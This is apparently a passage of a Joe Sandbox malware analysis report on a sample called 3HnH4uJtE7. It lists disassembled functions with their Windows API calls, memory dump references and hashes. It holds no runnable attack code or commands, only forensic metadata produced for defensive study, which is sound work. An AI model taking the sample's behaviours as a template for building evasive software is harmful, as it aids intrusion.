                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: CounterPerformanceQuerySleep
                                                                    • String ID:
                                                                    • API String ID: 2875609808-0
                                                                    • Opcode ID: 1eccaa258968f780cb998c711c3ed4cb51abc13aa4ee7afc22706c241d0e6de1
                                                                    • Instruction ID: e7bcf4dd96550cc6863fbca9265d4c7b83b437186a195b133a7c2326c6581659
                                                                    • Opcode Fuzzy Hash: 1eccaa258968f780cb998c711c3ed4cb51abc13aa4ee7afc22706c241d0e6de1
                                                                    • Instruction Fuzzy Hash: 9A11AD71C0852CEBCF04AFE4E9A8AEEBB78FF4D311F004499D941B2285CB308650DB51
                                                                    Function 00977E14 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetWindowRect.USER32(?,?), ref: 00977E33
                                                                    • ScreenToClient.USER32(?,?), ref: 00977E4B
                                                                    • ScreenToClient.USER32(?,?), ref: 00977E6F
                                                                    • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00977E8A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ClientRectScreen$InvalidateWindow
                                                                    • String ID:
                                                                    • API String ID: 357397906-0
                                                                    • Opcode ID: 26e77a391f56946a152d0babf0b5b19927e8de22b9c844ee19de29d24305cc53
                                                                    • Instruction ID: 5feba157858a008cf0d0785e6989e602100e1821c0db62e1aa9fac45b43ae609
                                                                    • Opcode Fuzzy Hash: 26e77a391f56946a152d0babf0b5b19927e8de22b9c844ee19de29d24305cc53
                                                                    • Instruction Fuzzy Hash: 831144BAD0420AAFDB41DF98D8849EEBBF9FF08310F509056E915E3210D735AA94DF51
                                                                    Function 00942DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00942DC5
                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00942DD6
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00942DDD
                                                                    • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00942DE4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                    • String ID:
                                                                    • API String ID: 2710830443-0
                                                                    • Opcode ID: 482d82fc2d1a954014926f34eba1a0bad468708706c221aabfde6a98da35f7b7
                                                                    • Instruction ID: 20428ff2a092635a595a1d1f9038cf9512ae4f15cdba86cb46be5428b6586653
                                                                    • Opcode Fuzzy Hash: 482d82fc2d1a954014926f34eba1a0bad468708706c221aabfde6a98da35f7b7
                                                                    • Instruction Fuzzy Hash: B8E092B2529224BBD7201B729C4DFEB7E6CFF82BB1F800019F109E10809AA4C880D6B0
                                                                    Function 00978863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 008F9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 008F9693
                                                                      • Part of subcall function 008F9639: SelectObject.GDI32(?,00000000), ref: 008F96A2
                                                                      • Part of subcall function 008F9639: BeginPath.GDI32(?), ref: 008F96B9
                                                                      • Part of subcall function 008F9639: SelectObject.GDI32(?,00000000), ref: 008F96E2
                                                                    • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00978887
                                                                    • LineTo.GDI32(?,?,?), ref: 00978894
                                                                    • EndPath.GDI32(?), ref: 009788A4
                                                                    • StrokePath.GDI32(?), ref: 009788B2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                    • String ID:
                                                                    • API String ID: 1539411459-0
                                                                    • Opcode ID: b602c19602a10607185733aa5eda29d07ef79c2583ba919e58263344f6aebd99
                                                                    • Instruction ID: 2ce8e17e0c0a71e6095e0c9e4381a31837c61dbc45ebbdf8fcf10d8dd9f7f365
                                                                    • Opcode Fuzzy Hash: b602c19602a10607185733aa5eda29d07ef79c2583ba919e58263344f6aebd99
                                                                    • Instruction Fuzzy Hash: B5F09A36059258BADB122F94AC0DFCA3E19AF06310F408104FA25610E1C7740550EBE6
                                                                    Function 008F98B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetSysColor.USER32(00000008), ref: 008F98CC
                                                                    • SetTextColor.GDI32(?,?), ref: 008F98D6
                                                                    • SetBkMode.GDI32(?,00000001), ref: 008F98E9
                                                                    • GetStockObject.GDI32(00000005), ref: 008F98F1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Color$ModeObjectStockText
                                                                    • String ID:
                                                                    • API String ID: 4037423528-0
                                                                    • Opcode ID: 384775dff2d15ae40770c216436728a2649d256ce8ad7197c52e85ebb16e6cac
                                                                    • Instruction ID: 9440b6df6b07719b5f335c4e821fb14f0e4041b7d202c4b4ce2c5d44ea3d5b66
                                                                    • Opcode Fuzzy Hash: 384775dff2d15ae40770c216436728a2649d256ce8ad7197c52e85ebb16e6cac
                                                                    • Instruction Fuzzy Hash: 72E0657225C244ABDB215B74AC09BE87F51EB11335F14822DF6F9540E1C3714680AF10
                                                                    Function 0094162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCurrentThread.KERNEL32 ref: 00941634
                                                                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,009411D9), ref: 0094163B
                                                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,009411D9), ref: 00941648
                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,009411D9), ref: 0094164F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentOpenProcessThreadToken
                                                                    • String ID:
                                                                    • API String ID: 3974789173-0
                                                                    • Opcode ID: a6062547add07b5abd5a1687ebe3db0f7a4f1341b1c78a228133821d707b7347
                                                                    • Instruction ID: 9299f3da4c34e6fc6559056ae48c21ac7cc47af842791698b2bcad03bf39ea8d
                                                                    • Opcode Fuzzy Hash: a6062547add07b5abd5a1687ebe3db0f7a4f1341b1c78a228133821d707b7347
                                                                    • Instruction Fuzzy Hash: 89E08CB3616211EBDB201FA0AE0DF863B7CAF44792F15880CF249E9090E73484C0DBA4
                                                                    Function 0093D858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDesktopWindow.USER32 ref: 0093D858
                                                                    • GetDC.USER32(00000000), ref: 0093D862
                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0093D882
                                                                    • ReleaseDC.USER32(?), ref: 0093D8A3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                    • String ID:
                                                                    • API String ID: 2889604237-0
                                                                    • Opcode ID: 8fd2a1393723c9ec78c76351fbb6b65d32d253f87a08863c8b6b672ff16e36ae
                                                                    • Instruction ID: fda12e957e80e70b8df8c0c2227759c317c82227ce61870a2c81ddbc783396f9
                                                                    • Opcode Fuzzy Hash: 8fd2a1393723c9ec78c76351fbb6b65d32d253f87a08863c8b6b672ff16e36ae
                                                                    • Instruction Fuzzy Hash: 97E01AB2814209DFCF41AFA0D84C66DBBB2FB08310F108409E90AE7250CB389981AF40
                                                                    Function 0093D86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDesktopWindow.USER32 ref: 0093D86C
                                                                    • GetDC.USER32(00000000), ref: 0093D876
                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0093D882
                                                                    • ReleaseDC.USER32(?), ref: 0093D8A3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                    • String ID:
                                                                    • API String ID: 2889604237-0
                                                                    • Opcode ID: dab6eba6c0469dc8a4890626019911b84f01462f15f17f22a9113acc2d19873b
                                                                    • Instruction ID: c559f1f0c97df5663053f7695e89fdcce655bc580865f92b5ae9134a4d4c649f
                                                                    • Opcode Fuzzy Hash: dab6eba6c0469dc8a4890626019911b84f01462f15f17f22a9113acc2d19873b
                                                                    • Instruction Fuzzy Hash: B1E01AB2C14209DFCF41AFA0D84C66DBBB1FB08310B108008E90AE7250CB385941AF40
                                                                    Function 00954D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 008E7620: _wcslen.LIBCMT ref: 008E7625
                                                                    • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00954ED4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Connection_wcslen
                                                                    • String ID: *$LPT
                                                                    • API String ID: 1725874428-3443410124
                                                                    • Opcode ID: 86bf569742cd3aa278ffae48deab8581a4574af6254e399134cc38b432f4d260
                                                                    • Instruction ID: ed6704f8af020ce086634de209385a4d1b35505453d452200a4de5c9d3d47bbe
                                                                    • Opcode Fuzzy Hash: 86bf569742cd3aa278ffae48deab8581a4574af6254e399134cc38b432f4d260
                                                                    • Instruction Fuzzy Hash: 9C916E75A002449FCB54DF59C484EAABBF5BF45308F188099E80A9F3A2C735ED89CB91
                                                                    Function 0090E27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __startOneArgErrorHandling.LIBCMT ref: 0090E30D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorHandling__start
                                                                    • String ID: pow
                                                                    • API String ID: 3213639722-2276729525
                                                                    • Opcode ID: b35a94105a0340e4549d8c65f20142554fb09c07a8cdc36d9a3fe1c3cef9461c
                                                                    • Instruction ID: 5b373c766d610ffebcac55fcbe91dc8bfef77637cc8f6f861c5530e6610ef16d
                                                                    • Opcode Fuzzy Hash: b35a94105a0340e4549d8c65f20142554fb09c07a8cdc36d9a3fe1c3cef9461c
                                                                    • Instruction Fuzzy Hash: BA512A71B1C10B9ACB157758D9013B9BBFCAB40740F744DA8E0D5823F9DB348CD1AA86
                                                                    Function 008FE187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #
                                                                    • API String ID: 0-1885708031
                                                                    • Opcode ID: e717ab409d63263ced14d3b7242e01489ef5112a3583adef55ffa00cec999152
                                                                    • Instruction ID: 973763f2554f8c97fb1648ce57f7293ec3b38c2acd34a81b7b2f7fb142acdbb7
                                                                    • Opcode Fuzzy Hash: e717ab409d63263ced14d3b7242e01489ef5112a3583adef55ffa00cec999152
                                                                    • Instruction Fuzzy Hash: 1C51237590424ADFDB25DF38C481ABA7BA8FF56310F244055F992DB2E0E7349D82CB91
                                                                    Function 008FF291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • Sleep.KERNEL32(00000000), ref: 008FF2A2
                                                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 008FF2BB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: GlobalMemorySleepStatus
                                                                    • String ID: @
                                                                    • API String ID: 2783356886-2766056989
                                                                    • Opcode ID: a0de8d4f6e6bf3c89c06570d08e2ce44dc4cf1151c1d99895cf8f235bd141949
                                                                    • Instruction ID: d781ab6478373b352c4a27999b6b8daa621aac5eae0161118d785a23e9c343e9
                                                                    • Opcode Fuzzy Hash: a0de8d4f6e6bf3c89c06570d08e2ce44dc4cf1151c1d99895cf8f235bd141949
                                                                    • Instruction Fuzzy Hash: 4851787181C7859BD320AF15E886BABBBF8FF85300F81484DF29981195EB718529CB67
                                                                    Function 00965745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 009657E0
                                                                    • _wcslen.LIBCMT ref: 009657EC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharUpper_wcslen
                                                                    • String ID: CALLARGARRAY
                                                                    • API String ID: 157775604-1150593374
                                                                    • Opcode ID: e1b0aada25b3aea9ac0a35128e55b2ad763019ce3e0d6a635804f65fe2968716
                                                                    • Instruction ID: 388e5d830ebafae5d8ae7d4ba4e53881611308d14f0081fc30e77f6392931b78
                                                                    • Opcode Fuzzy Hash: e1b0aada25b3aea9ac0a35128e55b2ad763019ce3e0d6a635804f65fe2968716
                                                                    • Instruction Fuzzy Hash: 7C41AF71E002099FCB14DFA9C8829FEBBF9FF59324F154069E505A7262E7349D81CB91
                                                                    Function 0095D0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _wcslen.LIBCMT ref: 0095D130
                                                                    • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0095D13A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: CrackInternet_wcslen
                                                                    • String ID: |
                                                                    • API String ID: 596671847-2343686810
                                                                    • Opcode ID: af3bf968825a64c4d3b87f93a774602c91566bcb973c560e3d6934e3ac948d10
                                                                    • Instruction ID: ee19f6cb99d55c74ec4caadf77f065a3201d32480778af38a04809cff5118bae
                                                                    • Opcode Fuzzy Hash: af3bf968825a64c4d3b87f93a774602c91566bcb973c560e3d6934e3ac948d10
                                                                    • Instruction Fuzzy Hash: 5E317E71C01219EBCF15EFA6CC85AEE7FB9FF05340F100059F819A6161EB31AA56CB61
                                                                    Function 0097356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • DestroyWindow.USER32(?,?,?,?), ref: 00973621
                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0097365C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Window$DestroyMove
                                                                    • String ID: static
                                                                    • API String ID: 2139405536-2160076837
                                                                    • Opcode ID: b06e413dec8db997c67e921d2ee9372e078882b7acfa2987c4f39ca557840bc1
                                                                    • Instruction ID: a894cce392cbd657709fe28f5c957bd1646f454138315c3081a8660147533554
                                                                    • Opcode Fuzzy Hash: b06e413dec8db997c67e921d2ee9372e078882b7acfa2987c4f39ca557840bc1
                                                                    • Instruction Fuzzy Hash: 3F318E72210604AADB109F28DC81ABB73ADFF88724F10C619F9A997280DA31AD91D760
                                                                    Function 00974537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 0097461F
                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00974634
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: '
                                                                    • API String ID: 3850602802-1997036262
                                                                    • Opcode ID: 0cac043db23c2c72e73aba8fc2a058c65a92df9d202f58b6efbbc4210f1c6c1b
                                                                    • Instruction ID: 0ab93869541a78e1bd1698ec3f806f1aaa150858cee816f650db9bd3fced8f90
                                                                    • Opcode Fuzzy Hash: 0cac043db23c2c72e73aba8fc2a058c65a92df9d202f58b6efbbc4210f1c6c1b
                                                                    • Instruction Fuzzy Hash: 15310775A0130A9FDB14CFA9C991BDA7BB9FF49300F14816AE909AB352D770A941CF90
                                                                    Function 009731EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0097327C
                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00973287
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
